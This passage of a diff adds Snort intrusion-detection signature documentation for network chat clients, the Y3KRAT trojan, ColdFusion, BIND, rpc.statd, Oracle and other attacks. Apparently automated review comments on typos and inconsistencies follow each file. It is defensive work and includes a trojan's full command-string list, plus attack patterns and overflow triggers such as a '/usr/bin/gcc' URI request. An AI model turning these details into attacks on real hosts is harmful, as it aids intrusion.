+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
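Review bot: Attack Scenarios describes authentication bypass ("access an authentication mechanism and supply his/her own credentials") while the Summary and Detailed Information describe remote file inclusion through the "phpraid_dir" parameter of "profile.php"; rewrite Attack Scenarios around the remote include. The third paragraph of Detailed Information is the same generic credential-validation boilerplate as in 100000772.txt and is not relevant here. Corrective Action could add that including a remote file also depends on the PHP configuration permitting URL includes (the allow_url_include and allow_url_fopen settings), so disabling those is a second mitigation besides patching. Typos: "running ona web server" should be "on a", "attackers choosing" should be "attacker's". Two leading blank lines and a trailing one after the final separator.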
--- /dev/null
+++ b/doc/signatures/1986.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1986
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
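Review bot: the Summary ("activity relating to network chat clients") does not say which client or protocol the rule matches, yet all three Additional References are MSN Messenger protocol documents; name the protocol in Summary and Detailed Information. The Affected Systems section is missing. Impact: "unkown" should be "unknown". The reference entries run together without the blank-line separation used in the other files.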
--- /dev/null
+++ b/doc/signatures/3083.txt
@@ -0,0 +1,141 @@
+Rule: 
+
+--
+Sid: 
+3083
+-- 
+Summary: 
+This event is generated when a Y3KRAT 1.5 server attempts to confirm the client's response.
+
+-- 
+Impact: 
+If connected, the attacker could execute a multitude of functions resulting in a complete compromise of the victim's machine.
+
+--
+Detailed Information:
+Y3KRAT 1.5 uses port 5880 by default. This port can be changed by the attacker. 
+
+The following is a list of the commands for many of Y3KRAT 1.5's functions (Command Name: Command String):
+
+AIM Passwords: aolpwd
+AIM Spy: aolspy
+Change Internet Explorer Caption: changeiecaptest
+Chat With Server: chatsrvY3K Rat user
+Clipboard: pastefromclip
+Change Desktop Color Scheme: clsys
+Change Recycle Bin Name: nrbin
+Change System Name: sysname
+Change Time: time
+Video List: getvideolist
+Dialup: autoconnect
+Access Directories: getclientgetpaths
+Get Directory Paths: getpaths
+Disable Mouse Buttons: dbuttons
+Disable Num Lock: dnumlock
+Disable System Keys: dsyskeys
+Disable All Keys: dkeys{all}
+DOS Commands: doscommands
+Fast Mouse: fastmouseon
+Find File: findfile
+Flip Screen: flip1hor
+FTP: openftp21
+Go To URL: gotourl
+Hide Taskbar: hidetask
+Hide Clock: hideclock
+Hide Desktop Icons: hidedeskicons
+Hide Start Button: hidestart
+Hide System Tray: hidesystray
+ICQ Information: getclienticqinfo
+ICQ Passwords: geticqpass
+ICQ Spy: icqspy
+Internet Explorer Spy: iespy
+General Information: general
+Lights On: lightson
+Lights Off: lightsoff
+Live Shot: cap
+Logged Passwords: getpasses
+Logoff: boot41
+Make File: makefile
+Matrix Chat: matrix
+Modify File (Read System File): readsysfiles
+Modify File (Write System File): writesysfiles
+Monitor Off: enablestandby
+Mouse Settings (Set Position): setpos
+Mouse Settings (Freeze Mouse Position): freezepos
+Mouse Settings (Speed Up Cursor): speedcursor
+MSN Spy: msnspy
+Napster Spy: napsterspy
+Net Get: netget
+NetStat (Read): netstatread
+NetStat (Kill): netstatkill
+CD-ROM open: cdopen
+CD-ROM close: cdclose
+Open File: getfiles
+Overclock: upmhz
+Play Sound: snd (*followed by the sound, for example, err for the error sound*)
+Power Off: boot31
+Print: print
+Ras Passwords: getras
+Remove Server: killserver
+Change Resolution: setdevmode
+Restart: boot21
+Safe Mode: safemode
+Screenshot: cap
+Send Keys: sendtextf
+Send Message: messText
+Show Windows With Text: showwin
+Shutdown: boot11
+Swap Mouse Buttons: swapbuttons
+Write System Error: writesystem
+Yahoo Spy: yahoospy
+
+
+--
+Affected Systems:
+	Windows 95, 98, ME, NT, 2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address and 
+presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+Remove the Dcomcnofg key located at the following places in the registry:
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\Run 
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\RunServices
+HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run
+
+Reboot the computer or close Dcomcnofg.exe.
+
+Delete Dcomcnofg.exe from the windows system directory.
+
+If found, delete server.exe and kill the process called server.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com> 
+
+-- 
+Additional References:
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/y3krat/15/index.shtml
+
+--
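Review bot: the registry hive name in the Corrective Action section is wrong: "HKEY_LOCAL_MACHINES\Software\..." should be "HKEY_LOCAL_MACHINE\Software\..." (no trailing S) on both lines, and the third path should be checked against the real key name under HKEY_USERS (the default user hive is written ".DEFAULT"), since a reader following these removal steps verbatim will not find the key. In the command list, "Live Shot: cap" and "Screenshot: cap" map to the same command string, so the two entries should either be merged or the distinction explained. The Attack Scenarios paragraph also switches into second person ("he has access to your computer") and advice ("Be wary of suspicious files"), which does not match the register of the other signature files; suggest rewriting it in the third person like the rest of the document.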
--- /dev/null
+++ b/doc/signatures/471.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+
+Sid:
+471
+
+--
+
+Summary:
+This event is generated when Icmpenum v1.1.1 generates an ICMP datagram.
+
+--
+
+Impact:
+ICMP echo requests are used to determine if a host is running at a
+specific IP address.  A remote attacker can scan a large range of hosts
+using ICMP echo requests to determine what hosts are operational on the
+network.
+
+--
+
+Detailed Information:
+Icmpenum v1.1.1 generates an ICMP Type 0 datagram with an ICMP ID of 666, an ICMP
+sequence number of 0, and an ICMP datagram size of 0.  
+
+--
+
+Attack Scenarios:
+A remote attacker might scan a large range of hosts using ICMP echo
+requests to determine what hosts are operational on the network.
+
+--
+
+Ease of Attack:
+Simple.  Packet generation tools can generate this type of ICMP packet
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+Packet generation tools can generate ICMP Echo requests with
+user-defined payloads that emulate this application.
+
+--
+
+Corrective Action:
+To prevent information gathering, use ingress filtering to block
+incoming ICMP Type 8 Code 0 traffic.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.whitehats.com/info/IDS450
+
+
+--
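Review bot: the Detailed Information section is inconsistent with the rest of the file about which ICMP type the rule covers. It says Icmpenum "generates an ICMP Type 0 datagram", while Impact and Attack Scenarios describe ICMP echo requests and Corrective Action recommends blocking "ICMP Type 8 Code 0"; Type 0 is Echo Reply and Type 8 is Echo Request, so one of these statements is wrong and the text should state the type the rule actually matches. Minor: "ICMP datagram size of 0" would be clearer as "a zero-length ICMP payload", the Ease of Attack sentence is missing its final period, and the contributor e-mail is in parentheses where every other file uses angle brackets.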
--- /dev/null
+++ b/doc/signatures/936.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
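Review bot: the Summary promises "a known vulnerability in a ColdFusion web server" but nothing in the file identifies which vulnerability or which request pattern this sid covers, and Additional References is empty; suggest naming the specific issue (or at least the request component the rule looks for) and adding a vendor advisory reference. Also "Coldfusion" in Detailed Information should match "ColdFusion" used in Summary and Affected Systems, and "attackers choosing" needs the possessive apostrophe ("attacker's choosing").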
--- /dev/null
+++ b/doc/signatures/647.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+647
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
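Review bot: the Impact line "Denial of Service (DoS) possible execution of arbitrary code." runs two impacts together and needs a separator ("Denial of Service (DoS); possible execution of arbitrary code."). Typo in Detailed Information: "instrucions" should be "instructions". The Attack Scenarios paragraph describes one specific DCERPC/Workstation service overflow while the rest of the file is about generic shellcode detection; either state that this is only an illustrative scenario or move it to the rule that covers that service. Given the false positive note about binary transfers, Corrective Action could also point the reader at verifying the alert against the actual content before acting on it.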
--- /dev/null
+++ b/doc/signatures/3056.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3056
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
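Review bot: Additional References is empty even though this file describes a specific, versioned bug (ACE size of 0 in ACL parsing, Ethereal 0.10.7 and prior); a vendor advisory or CVE reference should be added so the "known vulnerability" in the Summary can be verified. Detailed Information should also say which protocol dissector carries the "NT ACLs" mentioned in Attack Scenarios, since that is what tells an analyst where to look. Minor: "Apply the appropriate vendor supplied patch" is missing its final period.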
--- /dev/null
+++ b/doc/signatures/100000125.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000125
+
+-- 
+Summary: 
+This event is generated when an attempt is made to overflow a buffer in the 
+SafeNet Sentinel License Manager.
+
+-- 
+
+Impact: 
+The affected server will be crashed, and remote code execution with system 
+privileges is possible.
+
+--
+Detailed Information:
+If the SafeNet Sentinel License Manager recieves a packet containing over 1,000 
+bytes, a buffer will be overflowed. If properly crafted data is sent, arbitrary 
+code may be executed with system privileges.
+
+--
+Affected Systems:
+SafeNet Sentinel License Manager 7.2.0.2
+
+--
+
+Attack Scenarios: 
+A script must be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as an attack is included as part of the Metasploit vulnerability 
+testing framework.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Upgrade to version 8.0 of the affected software.
+
+--
+Contributors: 
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
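Review bot: typo in Detailed Information: "recieves" should be "receives". Additional References is empty although Ease of Attack cites the Metasploit framework as carrying an exploit; that module or the original advisory should be referenced so the 1,000-byte threshold and the version numbers (7.2.0.2 affected, 8.0 fixed) can be checked. Minor: the Affected Systems entry is not tab-indented like the equivalent entries in the other files.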
--- /dev/null
+++ b/doc/signatures/538.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+538
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
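Review bot: typo in Attack Scenarios: "adminsitrative" should be "administrative". The text is entirely generic (nothing in Summary or Detailed Information says which share name or request this particular sid matches), so the file does not let an analyst tell this event apart from the other Samba share-access rules; suggest naming the resource the rule looks for. Additional References is also empty.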
--- /dev/null
+++ b/doc/signatures/122-1.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-1
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
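Review bot: spelling errors in this hunk: "reconnaisance" (Impact) should be "reconnaissance" and "consititute" (Detailed Information) should be "constitute"; "tcp" in the Summary should be "TCP". The Corrective Action line "Apply any appropriate vendor supplied patches as appropriate." repeats "appropriate"; suggest "Apply any vendor supplied patches as appropriate." The file also opens with two blank lines before "Rule:", unlike the other signature files.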
--- /dev/null
+++ b/doc/signatures/1570.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1570
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+loadpage.cgi.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain access to the
+script loadpage.cgi, part of the CGI application AHG EZshopper running
+on a web server. Some applications do not perform stringent checks when
+validating the credentials of a client host connecting to the services
+offered on a host server. This can lead to unauthorized access and
+possibly escalated privileges to that of the administrator. Data stored
+on the machine can be compromised and trust relationships between the
+victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+
+	AHG EZshopper v3.0 and v2.0 for UNIX
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+NSFocus:
+http://www.nsfocus.com/english/homepage/research/0009.htm
+
+--
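Review bot: the Summary only says "access the file loadpage.cgi" and leaves the product name to Detailed Information; since loadpage.cgi is the AHG EZshopper script, naming the application in the Summary would make the event self-describing in an alert console. "attackers choosing" (Impact and Detailed Information) needs the possessive apostrophe.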
--- /dev/null
+++ b/doc/signatures/865.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+865
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
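Review bot: typo in Detailed Information: "running ona web server" should be "running on a web server", and "attackers choosing" needs the possessive apostrophe. The line ending "...exploited by the attacker." is much longer than the surrounding wrapped text and should be rewrapped. More substantively, nothing here identifies which CGI script sid 865 looks for, so the file is indistinguishable from the other generic CGI entries; suggest naming the script and adding a reference under the empty Additional References heading.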
--- /dev/null
+++ b/doc/signatures/2922.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+2922
+
+-- 
+Summary: 
+This event is generated when an inverse query attempt is made using TCP.
+
+-- 
+
+Impact: 
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Bind 8 contains a programming error that may present an attacker with
+the opportunity to execute code of their choosing on an affected server.
+
+The error occurs in the handling of malformed transactions. When using
+TCP this can result in the attacker causing a heap overflow.
+
+--
+Affected Systems:
+	Bind 8.
+
+--
+Attack Scenarios: 
+An attacker needs to send a specially crafted and malformed query to an
+affected server.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
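Review bot: the Summary says the event fires on "an inverse query attempt ... using TCP", but Detailed Information only mentions "malformed transactions" and never ties the inverse query to the heap overflow; the two sections should describe the same condition. "Bind" should be written "BIND" (the product name) and Affected Systems should give the affected 8.x releases rather than just "Bind 8." so an operator can tell whether they are exposed. Additional References is empty; a vendor advisory should be cited for a vulnerability this specific.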
--- /dev/null
+++ b/doc/signatures/1341.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted gcc command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The gcc command is the GNU project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/usr/bin/gcc'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
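Review bot: several text defects in this hunk: "compiile" should be "compile", "'/usr/bin/gcc'in the URI" is missing a space, "it's designated web root" should be "its", and the Corrective Action section has a stray blank line after its heading and no blank line before the closing "--". The sentence "setting the systems runtime securelevel also prevents the securelevel from being changed" is circular; it should say what raising the securelevel protects (the immutable flags just mentioned). Additional References lists related sids as "sid: 1342" etc. while other files give URLs; at least label them as related rules.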
--- /dev/null
+++ b/doc/signatures/1484.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1484
+
+--
+Summary:
+This event is generated when an attempt is made to access the tstisapi.dll component associated with the Pi3Web software. 
+
+--
+Impact:
+Remote access.  Malicious access of the tstisapi.dll component can allow the execution of arbitrary commands on a vulnerable server.
+
+--
+Detailed Information:
+Pi3Web is a free configurable HTTP server available on Linux and Windows for cross platform Internet server development and deployment.  A buffer overflow vulnerability exists in tstisapi.dll that may permit execution of arbitrary commands on the victim server.
+
+--
+Affected Systems:
+Pi3Web 2.0
+
+--
+Attack Scenarios:
+An attacker can craft an overly long request for tstisapi.dll that may cause a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the vendor patch.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0142
+
+Bugtraq
+http://www.securityfocus.com/bid/3866
+
+--
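Review bot: the Impact section says "execution of arbitrary commands" while Detailed Information describes a buffer overflow, which normally yields arbitrary code execution rather than command execution; the wording should be aligned. Minor style points: the Affected Systems entry is not tab-indented like the other files, and the "CVE" and "Bugtraq" reference labels lack the trailing colon used elsewhere.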
--- /dev/null
+++ b/doc/signatures/1916.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1916
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format
+string vulnerability associated with the Remote Procedure Call (RPC)
+rpc.statd.
+
+--
+Impact:
+Remote root access. This may permit execution of arbitrary commands with
+the privileges of root.
+
+--
+Detailed Information:
+The rpc.statd daemon is a component of Network File System (NFS) that
+implements the Network Status and Monitor (NSM) RPC functions.  NSM
+monitors the status of NFS clients and servers and maintains a list of
+hosts that have registered to be notified when an NFS host crashes. 
+There is a format string vulnerability associated with the code that
+implements the monitoring of a given host, possibly permitting the
+execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	Red Hat Linux 6.0, 6.1, 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit the format string error allowing
+execution of arbitrary commands with the privileges of root.  
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
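Review bot: Additional References is empty for a well-documented rpc.statd format string vulnerability; a CVE or vendor advisory reference should be added so the distribution list in Affected Systems can be verified. Affected Systems lists distributions but not the affected package or version of the statd implementation, which is what an operator actually checks. Several lines in Detailed Information and Attack Scenarios carry trailing whitespace.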
--- /dev/null
+++ b/doc/signatures/2739.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2739
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_nvarchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
